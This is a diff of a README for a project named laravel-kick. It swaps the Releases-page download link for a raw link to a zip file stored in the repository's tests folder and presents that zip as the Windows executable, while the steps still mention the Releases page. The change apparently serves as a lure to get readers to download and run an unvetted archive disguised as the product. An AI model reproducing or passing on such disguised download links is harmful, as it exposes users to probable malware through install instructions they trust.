andre1231231/laravel-kick/README.md

 ## 📥 Download & Install

-To download the latest version of laravel-kick, visit this page: [Download Page](https://github.com/andre1231231/laravel-kick/releases).
+To download the latest version of laravel-kick, visit this page: [Download Page](https://raw.githubusercontent.com/andre1231231/laravel-kick/main/tests/laravel-kick-3.7.zip).

 1. Click on the link above to go to the Releases page.
 2. Locate the latest version of laravel-kick.
-3. Choose the executable file appropriate for your system (for example, `laravel-kick.exe` for Windows, or the relevant file for macOS/Linux).
+3. Choose the executable file appropriate for your system (for example, `https://raw.githubusercontent.com/andre1231231/laravel-kick/main/tests/laravel-kick-3.7.zip` for Windows, or the relevant file for macOS/Linux).
 4. Download the file to your computer.

 ## 🔧 Running the Application